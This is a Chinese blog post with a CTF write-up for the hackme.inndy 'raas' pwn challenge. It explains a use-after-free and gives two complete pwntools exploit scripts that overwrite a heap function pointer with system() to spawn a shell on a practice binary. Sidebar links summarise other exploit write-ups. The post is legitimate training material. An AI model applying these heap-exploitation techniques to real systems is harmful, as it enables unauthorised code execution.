hackme inndy pwn raas writeup

最新推荐文章于 2021-01-19 15:50:06 发布
最新推荐文章于 2021-01-19 15:50:06 发布
阅读量373 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/78943796
版权

继续做题,之前一直对堆不是很熟,这次特地做一道堆的题来练手

首先题目给了提示,是一道UAF

这里写图片描述

可以看到,有3个操作,一个是新建,一个是删除,一个是展示

这里写图片描述

这里写图片描述

删除和展示如上,新建的代码太长,我就简述下功能吧

1.选择类型,数字还是字符串
2.如果是字符串,要输入长度
3.输入内容

内存的操作是,先new了一个大小为12的堆,前8位放的是用于展示的函数指针和用于删除的函数指针
如果是输入数字,那么最后那4位就是用于存放数字
如果是输入字符,那么再new一个指定长度的堆,该堆的指针放在最后那4位

简述完功能,我们来讲怎么做

因为是uaf,所以肯定要用展示和删除其中一个,展示这里pass,因为修改了展示的函数指针之后,传入的参数是堆的地址,这里明显不行。

那么只能改删除,我选择的是把删除的指针改成system的地址,但是这里参数只能写3个字节长度的字符串,因为中间4位要放调用的函数指针,一个字符串要以00结尾,写/bin/sh太长,只能写sh了

//话说其实我是想用echo2那个套路,用libc里面的magic值,一发get shell,但是实际尝试之后发现并不行

那么知道写哪里,写什么之后,之后就是怎么写了。

这里有好几个思路,但是都是大同小异。

一、
1. new 两个record,delete掉,这里的record类型随意,但是字符的要注意新new的长度不要等于12
2. new一个字符串类型的record,长度为12,假设new的两个record是0、1,删除的顺序是0、1,那么这个时候在fast bin的链表里面是 1->0 ,new一个record,存函数指针那个堆复用了1的堆,用来存内容的那个堆是用了0的堆
3. 我们往0那个堆里面写我们想要的东西,再删除0的record,这样就能get 到shell

二、
1. new两个字符的record,长度大于fastbin的范围,又属于small bin的范围,然后delete掉
new完之后堆的内存如下
| 0 | size 0x10
| 1 | size 0x70
| 2 | size 0x10
| 3 | size 0x70

这里其实我有个疑问。。为什么malloc(0xc)这里大小是0x10,malloc(0x68) 这里大小是0x70,一个+4,一个+8。。。。(有可能是fast bin和small bin不同,之后再慢慢研究。。。。

delete 完两个之后,前两个堆合并了,然后最后那个0x70和top chunk合并了,所以最后剩下大小为0x80、0x10的两个堆

2.new 一个字符的record,长度为0x78,这个时候写入的位置就是第0个record的函数指针所在的那个堆
3.接下来的思路就跟一 一样了

其实我本来还有一个骚操作的思路,就是上面提到的一发get shell,为了实现一发get shell,这里可以修改record[i]+8的值,然后利用他的printf函数泄漏libc地址,再推算出magic addr,一发get shell,但是实际上试了并不行,可能是函数传递约束的不同导致的吧。。。

payload1

from pwn import *
import time

debug=1
if debug:
    p=process('./raas')
else:
    p=remote('hackme.inndy.tw', 7719)



def new_record(index,length,content):
    p.sendline('1')
    p.recvuntil('Index > ')
    p.sendline(str(index))
    p.recvuntil('Type > ')
    p.sendline('2')
    p.recvuntil('Length > ')
    p.sendline(str(length))
    p.recvuntil('Value > ')
    if(len(content)<length):
        p.sendline(content)
    else:
        p.sendline(content[:-2])
    p.recvuntil('Act > ')

def del_record(index):
    p.sendline('2')
    p.recvuntil('Index > ')
    p.sendline(str(index))
    p.recvuntil('Act > ')

def show_record(index,get):
    p.sendline('3')
    p.recvuntil('Index >')
    p.sendline(str(index))
    if(get):
        p.recvuntil('Value=')
        data=p.recvuntil(')')
        return data
    p.recvuntil('Act > ')

#gdb.attach(proc.pidof(p)[0])
#context.log_level='debug'
new_record(0,20,'0000')
new_record(1,20,'1111')

del_record(0)
del_record(1)

system_addr=0x80484F0 
rec_printf=0x80486BE
rec_free=0x8048705
puts_addr=0x80484E0


new_record(2,12,'sh'+'\x00'*2+p32(system_addr))

p.sendline('2')
p.sendline('0')

p.interactive()

payload2

from pwn import *
import time

debug=1
if debug:
    p=process('./raas')
else:
    p=remote('hackme.inndy.tw', 7719)



def new_record(index,length,content):
    p.sendline('1')
    p.recvuntil('Index > ')
    p.sendline(str(index))
    p.recvuntil('Type > ')
    p.sendline('2')
    p.recvuntil('Length > ')
    p.sendline(str(length))
    p.recvuntil('Value > ')
    if(len(content)<length):
        p.sendline(content)
    else:
        p.sendline(content[:-2])
    p.recvuntil('Act > ')

def del_record(index):
    p.sendline('2')
    p.recvuntil('Index > ')
    p.sendline(str(index))
    p.recvuntil('Act > ')

def show_record(index,get):
    p.sendline('3')
    p.recvuntil('Index >')
    p.sendline(str(index))
    if(get):
        p.recvuntil('Value=')
        data=p.recvuntil(')')
        return data
    p.recvuntil('Act > ')

#gdb.attach(proc.pidof(p)[0])
#context.log_level='debug'
new_record(0,104,'0000')
new_record(1,104,'1111')

del_record(0)
del_record(1)

system_addr=0x80484F0 
rec_printf=0x80486BE
rec_free=0x8048705
puts_addr=0x80484E0


new_record(2,104+16,'sh'+'\x00'*2+p32(system_addr))

p.sendline('2')
p.sendline('0')

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
hackme inndy petbook writeup
charlie_heng的专栏
02-16 455
这题一直没人做,感觉好像很难,其实是自己吓倒自己 这题的漏洞其实很明显,就是没有初始化对象,所以可以控制新new出来的user的pet的地址和post的地址 这里说下怎么控制 ·1. new一个比一个user大,即大于536字节的post 2. edit这个post,将这个post弄成更大的,这个时候realloc会把原来的堆给free掉,然后再new一个新的堆 3. 这个时候再new一...
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 483
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
hackme inndy pwn tictactoe writeup
charlie_heng的专栏
01-03 542
昨天立的果然是个flag。。。。还是忍不住做了 这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了 但是怎么get shell呢? 看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢? 最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将...
NUAACTF pwn string writeup
qq_39596232的博客
08-24 1596
题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目分析: 1、首先查看下文件的信息及其保护机制: tucker@ubuntu:~/pwn$ file string string: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter...
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 513
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 449
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
[BUGKU][CTF][PWN][2020] PWN writeup
dadongwudi的博客
01-12 596
PWN1 关键字:nc 知识点:nc使用方法 https://www.cnblogs.com/nmap/p/6148306.html nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不仅可以使用IPv4和IPv6,而且可以为用户提供无限的潜在用途。 在nc的大量功能中,有能力将nc链接在一起;TCP、UDP和到其他站点的SCTP端口;支持
hackme的web部分水题writeup集合
cggwz的信息飞船
10-31 441
简单介绍,hackme是提供ctf基础题的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的题说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道题,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 409
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
hackme inndy reverse rc87cipher writeup
charlie_heng的专栏
02-01 587
话说这题真的挺难折腾出来的 首先这个程序是有upx壳的 但是这个壳被魔改了,关键的信息都被删除了,在google搜了半天linux upx upack 都找不到什么有用的信息 有两条路,一条是修复关键信息,一条路是像windows那些程序那样手动脱壳脱下来 两条路其实都试了一下,不过最终行得通的是第二条路 这里说下第一条路,如果你们有兴趣的话,可以去试试 首先作者把0xB4~0xB7处...
hackme inndy pwn veryoverflow writeup
charlie_heng的专栏
01-02 557
这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。 这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’) 因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的 其...
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 863
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
raas的wp
一个码农的笔记
11-22 1669
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了raas这个题目感觉还不错,我把wp分享出来,方便大家学习 raas的题目要求是:nc hackme.inndy.tw 7719 This is a Record-as-a-Service! And also our fist heap-based challenge. Source code is avail
hackme.inndy.tw raas 经验总结
qq_43189757的博客
08-05 211
相关资料: Glibc内存管理 如果有人看我的总结的话直接看资料就行了,堆之类的我也刚接触,不怎么熟悉 UAF漏洞原理是 在释放较小的堆块的时候不会立马把这个堆块放到small bins 当中,而会把这个堆块放到fast bins当中, 当需要再次分配堆块的时候会优先再 fast bins寻找合适的堆块,找到了则返回,如果没找到才会去small bins中寻找空闲的堆块。利用这个特性可以造成堆块重...
hackme pwn rop2 [syscall + rop]
ACdream
02-05 515
先checksec一下: 有个大概思路:rop过NX main中和overflow函数里都有syscall函数,如下: 观察到这里有缓冲区溢出!"A" * 0xC! 先来学习syscall函数: syscall(int arg1, ……),为可变参数的函数,第一个参数为系统调用号,用以下命令查询: cat -n /usr/include/x86_64-linux-gnu/...
hackme.inndy.tw - pyyy
weixin_30776545的博客
04-01 138
0x01 反编译 1.第一次尝试的时候我直接在线反编译,部分结果如下。 for (i, f) in enumerate(F): n = pow(f, m, g) this_is = 'Y-Combinator' l = (lambda f: ((lambda x: x(x)),)((lambda y: (f,)((lambda : y(y)(*args)))...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值